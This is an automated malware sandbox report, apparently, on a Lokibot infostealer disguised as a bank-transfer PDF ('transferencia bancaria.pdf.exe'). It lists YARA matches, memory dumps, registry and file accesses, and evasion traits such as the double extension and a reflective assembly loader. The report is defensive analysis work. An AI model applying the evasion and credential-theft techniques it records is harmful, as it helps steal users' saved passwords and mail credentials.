Source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.275125166.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: transferencia bancaria.pdf.exe PID: 1100, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: transferencia bancaria.pdf.exe PID: 5228, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Code function: 0_2_031A3B98
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Code function: 0_2_031AC5F4
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Code function: 0_2_031A484F
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Code function: 0_2_031AEFD8
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Code function: 0_2_031AEFC8
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Code function: 0_2_031A6D23
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Code function: 0_2_031A6CD0

Source: transferencia bancaria.pdf.exe, 00000000.00000002.291185342.000000000445F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCollins.dll8 vs transferencia bancaria.pdf.exe
Source: transferencia bancaria.pdf.exe, 00000000.00000002.287796129.00000000033AD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWise.dll6 vs transferencia bancaria.pdf.exe
Source: transferencia bancaria.pdf.exe, 00000000.00000002.295805972.00000000078E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameWise.dll6 vs transferencia bancaria.pdf.exe
Source: transferencia bancaria.pdf.exe, 00000000.00000002.295985554.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCollins.dll8 vs transferencia bancaria.pdf.exe
Source: transferencia bancaria.pdf.exe, 00000000.00000000.249144170.0000000000F42000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameXwux.exe6 vs transferencia bancaria.pdf.exe
Source: transferencia bancaria.pdf.exe, 00000000.00000002.277771631.0000000003311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWise.dll6 vs transferencia bancaria.pdf.exe
Source: transferencia bancaria.pdf.exe	Binary or memory string: OriginalFilenameXwux.exe6 vs transferencia bancaria.pdf.exe

Source: transferencia bancaria.pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: transferencia bancaria.pdf.exe	ReversingLabs: Detection: 12%
Source: transferencia bancaria.pdf.exe	Virustotal: Detection: 20%

Source: transferencia bancaria.pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\transferencia bancaria.pdf.exe C:\Users\user\Desktop\transferencia bancaria.pdf.exe
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process created: C:\Users\user\Desktop\transferencia bancaria.pdf.exe C:\Users\user\Desktop\transferencia bancaria.pdf.exe
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process created: C:\Users\user\Desktop\transferencia bancaria.pdf.exe C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\transferencia bancaria.pdf.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/3@40/1

Source: transferencia bancaria.pdf.exe, 00000001.00000003.276188616.0000000000B77000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: transferencia bancaria.pdf.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Source: transferencia bancaria.pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: transferencia bancaria.pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: transferencia bancaria.pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation

Yara detected aPLib compressed binary

Source: Yara match	File source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.transferencia bancaria.pdf.exe.442b890.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: transferencia bancaria.pdf.exe PID: 1100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: transferencia bancaria.pdf.exe PID: 5228, type: MEMORYSTR

.NET source code contains potential unpacker

Source: transferencia bancaria.pdf.exe, Form1.cs	.Net Code: QWERTYSDFGHJK System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.transferencia bancaria.pdf.exe.f40000.0.unpack, Form1.cs	.Net Code: QWERTYSDFGHJK System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: transferencia bancaria.pdf.exe

Static PE information: 0xA9237CA5 [Wed Dec 3 11:06:13 2059 UTC]

Source: initial sample

Static PE information: section name: .text entropy: 6.915983824184794

Hooking and other Techniques for Hiding and Protection

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: pdf.exe

Static PE information: transferencia bancaria.pdf.exe

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
